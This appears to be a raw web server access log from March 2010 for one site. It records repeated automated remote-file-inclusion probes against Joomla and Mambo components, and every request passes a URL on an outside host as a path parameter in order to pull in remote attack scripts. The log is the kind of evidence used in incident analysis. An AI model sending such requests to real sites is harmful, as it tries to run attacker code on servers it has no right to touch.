209.217.76.226 - - [12/Mar/2010:08:45:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:45:27 -0800] "GET /logs/access_090505.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:45:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:46:10 -0800] "GET /logs/access_081003.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:46:10 -0800] "GET /logs/access_090512.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:46:13 -0800] "GET /logs/access_080110.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:46:58 -0800] "GET /logs/access_071202.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:47:03 -0800] "GET /logs/access_080110.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:47:17 -0800] "GET /logs/access_080110.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:47:22 -0800] "GET /logs/access_080110.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:47:30 -0800] "GET /logs/access_081003.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:47:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:47:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:47:31 -0800] "GET /logs/access_071202.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:47:32 -0800] "GET /logs/access_090505.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:47:34 -0800] "GET /logs/access_071202.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:47:39 -0800] "GET /logs/access_071202.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:08:48:12 -0800] "GET /com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:08:48:12 -0800] "GET /logs//com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:08:48:12 -0800] "GET /logs/access_091021.log%20%20//com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:48:25 -0800] "GET /logs/access_080707.log%20%20/index1.php?menu=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:48:38 -0800] "GET /logs/access_080707.log%20%20/index1.php?menu=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:48:50 -0800] "GET /logs/access_080614.log%20%20/index1.php?menu=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:49:05 -0800] "GET /logs/access_080614.log%20%20/index1.php?menu=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:49:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:49:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:49:17 -0800] "GET /logs/access_090505.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:49:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:49:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:49:23 -0800] "GET /logs/access_090505.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:49:25 -0800] "GET /logs/access_080707.log%20%20/index1.php?menu=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:49:44 -0800] "GET /logs/access_090512.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:49:47 -0800] "GET /logs/access_080614.log%20%20/index1.php?menu=http://art-investments.eu/id1???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:06 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:06 -0800] "GET /logs/access_080810.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:07 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:11 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:11 -0800] "GET /logs/access_080810.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:12 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:12 -0800] "GET /logs/access_080330.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:19 -0800] "GET /logs/access_080330.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:50:20 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:50:20 -0800] "GET /logs/access_071023.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:50:24 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:50:24 -0800] "GET /logs/access_071023.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:50:24 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:50:24 -0800] "GET /logs/access_071023.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:50:26 -0800] "GET /logs/access_080712.log///components/com_mambowiki/Mam***ogin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:50:31 -0800] "GET /logs/access_080514.log///components/com_mambowiki/Mam***ogin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:50:49 -0800] "GET /index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:50:54 -0800] "GET /index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:50:55 -0800] "GET /logs//index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:50:55 -0800] "GET /logs/access_080708.log%20%20//index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:50:56 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:50:56 -0800] "GET /logs/access_071023.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:59 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:50:59 -0800] "GET /logs/access_080810.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:51:00 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:51:00 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:51:00 -0800] "GET /logs/access_080810.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:51:01 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:51:03 -0800] "GET /logs//index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:51:03 -0800] "GET /logs/access_080708.log%20%20//index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:51:04 -0800] "GET /logs/access_090512.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:20 -0800] "GET /logs///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:20 -0800] "GET //components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:20 -0800] "GET /logs/access_080825.log%20%20///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:51:21 -0800] "GET /logs/access_080330.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:51:23 -0800] "GET /logs/access_080330.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:51:26 -0800] "GET /logs/access_090512.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:30 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:30 -0800] "GET /logs/access_071125.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:30 -0800] "GET /logs/access_071125.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:30 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:31 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:31 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:31 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:31 -0800] "GET /logs/access_071125.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:34 -0800] "GET /logs/access_071028.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:37 -0800] "GET /logs/access_071028.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:37 -0800] "GET /logs/access_080607.log%20%20///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:39 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:39 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:39 -0800] "GET /logs/access_071125.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:41 -0800] "GET /logs/access_071028.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:51:46 -0800] "GET /logs/access_100228.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:51:46 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:51:46 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:51:46 -0800] "GET /logs/access_071028.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:51 -0800] "GET //components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.157.211.204 - - [12/Mar/2010:08:51:53 -0800] "GET /logs/access_091231.log//include/prodler.class.php?sPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.157.211.204 - - [12/Mar/2010:08:51:53 -0800] "GET /include/prodler.class.php?sPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.157.211.204 - - [12/Mar/2010:08:51:53 -0800] "GET /logs//include/prodler.class.php?sPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:53 -0800] "GET /logs///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:53 -0800] "GET /logs/access_080825.log%20%20///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:56 -0800] "GET /logs/access_080825.log%20%20///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:56 -0800] "GET /logs///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:51:56 -0800] "GET //components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:52:02 -0800] "GET /logs/access_091023.log//index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:52:03 -0800] "GET /logs//index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:52:03 -0800] "GET /index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:52:04 -0800] "GET /logs/access_091023.log//index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:52:04 -0800] "GET /logs//index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:52:05 -0800] "GET /index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:11 -0800] "GET /logs/access_080607.log%20%20///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:13 -0800] "GET /logs/access_080607.log%20%20///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:16 -0800] "GET //components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:16 -0800] "GET /logs/access_080825.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:16 -0800] "GET /logs///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:20 -0800] "GET //components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:20 -0800] "GET /logs///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:20 -0800] "GET /logs/access_080825.log%20%20///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:52:21 -0800] "GET /logs/access_080810.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
